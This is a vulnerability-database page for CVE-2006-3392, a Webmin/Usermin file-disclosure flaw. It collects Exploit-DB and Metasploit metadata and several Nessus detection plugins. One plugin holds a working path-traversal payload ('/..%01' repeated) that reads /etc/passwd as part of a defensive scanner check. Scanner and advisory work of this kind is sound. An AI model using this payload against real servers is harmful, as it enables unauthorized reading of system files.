Vulnerabilities > CVE-2006-3392 - Information Disclosure vulnerability in Webmin/Usermin Unspecifed
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
PARTIAL Integrity impact
NONE Availability impact
NONE Summary
Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files, as demonstrated using "..%01" sequences, which bypass the removal of "../" sequences before bytes such as "%01" are removed from the filename. NOTE: This is a different issue than CVE-2006-3274.
Vulnerable Configurations
Exploit-Db
| description | Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit. CVE-2006-3392. Remote exploits for multiple platform |
| id | EDB-ID:1997 |
| last seen | 2016-01-31 |
| modified | 2006-07-09 |
| published | 2006-07-09 |
| reporter | joffer |
| source | https://www.exploit-db.com/download/1997/ |
| title | Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure Exploit PHP |
Metasploit
| description | A vulnerability has been reported in Webmin and Usermin, which can be exploited by malicious people to disclose potentially sensitive information. The vulnerability is caused due to an unspecified error within the handling of an URL. This can be exploited to read the contents of any files on the server via a specially crafted URL, without requiring a valid login. The vulnerability has been reported in Webmin (versions prior to 1.290) and Usermin (versions prior to 1.220). |
| id | MSF:AUXILIARY/ADMIN/WEBMIN/FILE_DISCLOSURE |
| last seen | 2020-06-12 |
| modified | 2020-05-12 |
| published | 2008-01-06 |
| references | |
| reporter | Rapid7 |
| source | https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/admin/webmin/file_disclosure.rb |
| title | Webmin File Disclosure |
Nessus
NASL family Debian Local Security Checks NASL id DEBIAN_DSA-1199.NASL description Several vulnerabilities have been identified in webmin, a web-based administration toolkit. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities : - CVE-2005-3912 A format string vulnerability in miniserv.pl could allow an attacker to cause a denial of service by crashing the application or exhausting system resources, and could potentially allow arbitrary code execution. - CVE-2006-3392 Improper input sanitization in miniserv.pl could allow an attacker to read arbitrary files on the webmin host by providing a specially crafted URL path to the miniserv http server. - CVE-2006-4542 Improper handling of null characters in URLs in miniserv.pl could allow an attacker to conduct cross-site scripting attacks, read CGI program source code, list local directories, and potentially execute arbitrary code. Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc. last seen 2020-06-01 modified 2020-06-02 plugin id 22908 published 2006-10-25 reporter This script is Copyright (C) 2006-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/22908 title Debian DSA-1199-1 : webmin - multiple vulnerabilities code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Debian Security Advisory DSA-1199. The text # itself is copyright (C) Software in the Public Interest, Inc. # include("compat.inc"); if (description) { script_id(22908); script_version("1.19"); script_cvs_date("Date: 2019/08/02 13:32:20"); script_cve_id("CVE-2005-3912", "CVE-2006-3392", "CVE-2006-4542"); script_bugtraq_id(15629, 18744, 19820); script_xref(name:"DSA", value:"1199"); script_name(english:"Debian DSA-1199-1 : webmin - multiple vulnerabilities"); script_summary(english:"Checks dpkg output for the updated package"); script_set_attribute( attribute:"synopsis", value:"The remote Debian host is missing a security-related update." ); script_set_attribute( attribute:"description", value: "Several vulnerabilities have been identified in webmin, a web-based administration toolkit. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities : - CVE-2005-3912 A format string vulnerability in miniserv.pl could allow an attacker to cause a denial of service by crashing the application or exhausting system resources, and could potentially allow arbitrary code execution. - CVE-2006-3392 Improper input sanitization in miniserv.pl could allow an attacker to read arbitrary files on the webmin host by providing a specially crafted URL path to the miniserv http server. - CVE-2006-4542 Improper handling of null characters in URLs in miniserv.pl could allow an attacker to conduct cross-site scripting attacks, read CGI program source code, list local directories, and potentially execute arbitrary code. Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, m68k, mips, mipsel, powerpc, s390 and sparc." ); script_set_attribute( attribute:"see_also", value:"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=341394" ); script_set_attribute( attribute:"see_also", value:"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=381537" ); script_set_attribute( attribute:"see_also", value:"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=391284" ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2005-3912" ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2006-3392" ); script_set_attribute( attribute:"see_also", value:"https://security-tracker.debian.org/tracker/CVE-2006-4542" ); script_set_attribute( attribute:"see_also", value:"http://www.debian.org/security/2006/dsa-1199" ); script_set_attribute( attribute:"solution", value: "Upgrade the webmin (1.180-3sarge1) package. For the stable distribution (sarge), these problems have been fixed in version 1.180-3sarge1. Webmin is not included in unstable (sid) or testing (etch), so these problems are not present." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploit_framework_core", value:"true"); script_set_attribute(attribute:"exploit_framework_canvas", value:"true"); script_set_attribute(attribute:"canvas_package", value:'CANVAS'); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:webmin"); script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.1"); script_set_attribute(attribute:"patch_publication_date", value:"2006/10/23"); script_set_attribute(attribute:"plugin_publication_date", value:"2006/10/25"); script_set_attribute(attribute:"vuln_publication_date", value:"2005/11/29"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc."); script_family(english:"Debian Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l"); exit(0); } include("audit.inc"); include("debian_package.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian"); if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (deb_check(release:"3.1", prefix:"webmin", reference:"1.180-3sarge1")) flag++; if (deb_check(release:"3.1", prefix:"webmin-core", reference:"1.180-3sarge1")) flag++; if (flag) { if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get()); else security_hole(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");NASL family CGI abuses NASL id USERMIN_1220_INFO_DISCLOSURE.NASL description The Usermin install on the remote host is affected by an information disclosure flaw in the Perl script last seen 2020-03-18 modified 2014-09-16 plugin id 77704 published 2014-09-16 reporter This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/77704 title Usermin 'miniserv.pl' Arbitrary File Disclosure code # # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(77704); script_version("1.7"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/02/26"); script_cve_id("CVE-2006-3392"); script_bugtraq_id(18744); script_name(english:"Usermin 'miniserv.pl' Arbitrary File Disclosure"); script_summary(english:"Attempts to read a local file using miniserv.pl."); script_set_attribute(attribute:"synopsis", value: "The remote web server is affected by an information disclosure flaw."); script_set_attribute(attribute:"description", value: "The Usermin install on the remote host is affected by an information disclosure flaw in the Perl script 'miniserv.pl'. This flaw could allow a remote, unauthenticated attacker to read arbitrary files on the affected host, subject to the privileges of the web server user id."); script_set_attribute(attribute:"see_also", value:"http://www.webmin.com/uchanges.html"); script_set_attribute(attribute:"solution", value: "Upgrade Usermin 1.220 or later."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_attribute(attribute:"cvss_score_source", value:"CVE-2006-3392"); script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"exploited_by_nessus", value:"true"); script_set_attribute(attribute:"vuln_publication_date", value:"2006/06/29"); script_set_attribute(attribute:"patch_publication_date", value:"2006/06/29"); script_set_attribute(attribute:"plugin_publication_date", value:"2014/09/16"); script_set_attribute(attribute:"plugin_type", value:"remote"); script_set_attribute(attribute:"cpe", value:"cpe:/a:webmin:usermin"); script_set_attribute(attribute:"cpe", value:"cpe:/a:usermin:usermin"); script_end_attributes(); script_category(ACT_ATTACK); script_family(english:"CGI abuses"); script_copyright(english:"This script is Copyright (C) 2014-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("usermin_detect.nbin"); script_require_keys("www/usermin"); script_require_ports("Services/www", 20000); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("http.inc"); include("data_protection.inc"); app = "Usermin"; port = get_http_port(default:20000, embedded: TRUE); get_kb_item_or_exit('www/'+port+'/usermin'); dir = '/'; install_url = build_url(port:port, qs:dir); # Try to exploit the flaw to read a local file. file = "/etc/passwd"; exploit = "unauthenticated" + crap(data:"/..%01", length:60) + file; res = http_send_recv3( method : "GET", port : port, item : dir + exploit, exit_on_fail : TRUE ); # There's a problem if there's an entry for root. if (egrep(pattern:"root:.*:0:[01]:", string:res[2])) { report = NULL; attach_file = NULL; output = NULL; req = install_url + exploit; request = NULL; if (report_verbosity > 0) { report = '\n' + 'Nessus was able to exploit this issue with the following URL : ' + '\n' + req + '\n'; if (report_verbosity > 1) { output = data_protection::redact_etc_passwd(output:res[2]); attach_file = file; request = make_list(req); } } security_report_v4(port:port, extra:report, severity:SECURITY_WARNING, request:request, file:attach_file, output:output); exit(0); } audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);NASL family Gentoo Local Security Checks NASL id GENTOO_GLSA-200608-11.NASL description The remote host is affected by the vulnerability described in GLSA-200608-11 (Webmin, Usermin: File Disclosure) A vulnerability in both Webmin and Usermin has been discovered by Kenny Chen, wherein simplify_path is called before the HTML is decoded. Impact : A non-authenticated user can read any file on the server using a specially crafted URL. Workaround : For a temporary workaround, IP Access Control can be setup on Webmin and Usermin. last seen 2020-06-01 modified 2020-06-02 plugin id 22169 published 2006-08-07 reporter This script is Copyright (C) 2006-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/22169 title GLSA-200608-11 : Webmin, Usermin: File Disclosure code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Gentoo Linux Security Advisory GLSA 200608-11. # # The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc. # and licensed under the Creative Commons - Attribution / Share Alike # license. See http://creativecommons.org/licenses/by-sa/3.0/ # include("compat.inc"); if (description) { script_id(22169); script_version("1.15"); script_cvs_date("Date: 2019/08/02 13:32:43"); script_cve_id("CVE-2006-3392"); script_xref(name:"GLSA", value:"200608-11"); script_name(english:"GLSA-200608-11 : Webmin, Usermin: File Disclosure"); script_summary(english:"Checks for updated package(s) in /var/db/pkg"); script_set_attribute( attribute:"synopsis", value: "The remote Gentoo host is missing one or more security-related patches." ); script_set_attribute( attribute:"description", value: "The remote host is affected by the vulnerability described in GLSA-200608-11 (Webmin, Usermin: File Disclosure) A vulnerability in both Webmin and Usermin has been discovered by Kenny Chen, wherein simplify_path is called before the HTML is decoded. Impact : A non-authenticated user can read any file on the server using a specially crafted URL. Workaround : For a temporary workaround, IP Access Control can be setup on Webmin and Usermin." ); script_set_attribute( attribute:"see_also", value:"https://security.gentoo.org/glsa/200608-11" ); script_set_attribute( attribute:"solution", value: "All Webmin users should update to the latest stable version: # emerge --sync # emerge --ask --verbose --oneshot '>=app-admin/webmin-1.290' All Usermin users should update to the latest stable version: # emerge --sync # emerge --ask --verbose --oneshot '>=app-admin/usermin-1.220'" ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:usermin"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:gentoo:linux:webmin"); script_set_attribute(attribute:"cpe", value:"cpe:/o:gentoo:linux"); script_set_attribute(attribute:"patch_publication_date", value:"2006/08/06"); script_set_attribute(attribute:"plugin_publication_date", value:"2006/08/07"); script_set_attribute(attribute:"vuln_publication_date", value:"2006/06/29"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc."); script_family(english:"Gentoo Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/Gentoo/release", "Host/Gentoo/qpkg-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("qpkg.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Gentoo/release")) audit(AUDIT_OS_NOT, "Gentoo"); if (!get_kb_item("Host/Gentoo/qpkg-list")) audit(AUDIT_PACKAGE_LIST_MISSING); flag = 0; if (qpkg_check(package:"app-admin/usermin", unaffected:make_list("ge 1.220"), vulnerable:make_list("lt 1.220"))) flag++; if (qpkg_check(package:"app-admin/webmin", unaffected:make_list("ge 1.290"), vulnerable:make_list("lt 1.290"))) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get()); else security_warning(0); exit(0); } else { tested = qpkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "Webmin / Usermin"); }NASL family Mandriva Local Security Checks NASL id MANDRAKE_MDKSA-2006-125.NASL description Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files. NOTE: This is a different issue than CVE-2006-3274. Updated packages have been patched to correct this issue. last seen 2020-06-01 modified 2020-06-02 plugin id 23876 published 2006-12-16 reporter This script is Copyright (C) 2006-2019 Tenable Network Security, Inc. source https://www.tenable.com/plugins/nessus/23876 title Mandrake Linux Security Advisory : webmin (MDKSA-2006:125) code #%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Mandrake Linux Security Advisory MDKSA-2006:125. # The text itself is copyright (C) Mandriva S.A. # include("compat.inc"); if (description) { script_id(23876); script_version ("1.17"); script_cvs_date("Date: 2019/08/02 13:32:48"); script_cve_id("CVE-2006-3392"); script_xref(name:"MDKSA", value:"2006:125"); script_name(english:"Mandrake Linux Security Advisory : webmin (MDKSA-2006:125)"); script_summary(english:"Checks rpm output for the updated package"); script_set_attribute( attribute:"synopsis", value:"The remote Mandrake Linux host is missing a security update." ); script_set_attribute( attribute:"description", value: "Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files. NOTE: This is a different issue than CVE-2006-3274. Updated packages have been patched to correct this issue." ); script_set_attribute( attribute:"solution", value:"Update the affected webmin package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:mandriva:linux:webmin"); script_set_attribute(attribute:"cpe", value:"cpe:/o:mandriva:linux:2006"); script_set_attribute(attribute:"patch_publication_date", value:"2006/07/18"); script_set_attribute(attribute:"plugin_publication_date", value:"2006/12/16"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2006-2019 Tenable Network Security, Inc."); script_family(english:"Mandriva Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/cpu", "Host/Mandrake/release", "Host/Mandrake/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); if (!get_kb_item("Host/Mandrake/release")) audit(AUDIT_OS_NOT, "Mandriva / Mandake Linux"); if (!get_kb_item("Host/Mandrake/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if (cpu !~ "^(amd64|i[3-6]86|x86_64)$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Mandriva / Mandrake Linux", cpu); flag = 0; if (rpm_check(release:"MDK2006.0", reference:"webmin-1.220-9.4.20060mdk", yank:"mdk")) flag++; if (rpm_check(release:"MDK2006.0", cpu:"x86_64", reference:"webmin-1.220-9.4.20060mdk", yank:"mdk")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else audit(AUDIT_HOST_NOT, "affected");NASL family CGI abuses NASL id WEBMIN_1290.NASL description The version of Webmin installed on the remote host is affected by an information disclosure flaw due to a flaw in the Perl script last seen 2020-03-18 modified 2006-06-30 plugin id 21785 published 2006-06-30 reporter This script is Copyright (C) 2006-2020 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/21785 title Webmin 'miniserv.pl' Arbitrary File Disclosure NASL family FreeBSD Local Security Checks NASL id FREEBSD_PKG_227475C209CB11DB9156000E0C2E438A.NASL description The webmin development team reports : An attacker without a login to Webmin can read the contents of any file on the server using a specially crafted URL. All users should upgrade to version 1.290 as soon as possible, or setup IP access control in Webmin. last seen 2020-06-01 modified 2020-06-02 plugin id 21789 published 2006-07-03 reporter This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/21789 title FreeBSD : webmin, usermin -- arbitrary file disclosure vulnerability (227475c2-09cb-11db-9156-000e0c2e438a)
References
- http://attrition.org/pipermail/vim/2006-July/000923.html
- http://attrition.org/pipermail/vim/2006-June/000912.html
- http://secunia.com/advisories/20892
- http://secunia.com/advisories/21105
- http://secunia.com/advisories/21365
- http://secunia.com/advisories/22556
- http://security.gentoo.org/glsa/glsa-200608-11.xml
- http://www.debian.org/security/2006/dsa-1199
- http://www.kb.cert.org/vuls/id/999601
- http://www.mandriva.com/security/advisories?name=MDKSA-2006:125
- http://www.osvdb.org/26772
- http://www.securityfocus.com/archive/1/439653/100/0/threaded
- http://www.securityfocus.com/archive/1/440125/100/0/threaded
- http://www.securityfocus.com/archive/1/440466/100/0/threaded
- http://www.securityfocus.com/archive/1/440493/100/0/threaded
- http://www.securityfocus.com/bid/18744
- http://www.vupen.com/english/advisories/2006/2612
- http://www.webmin.com/changes.html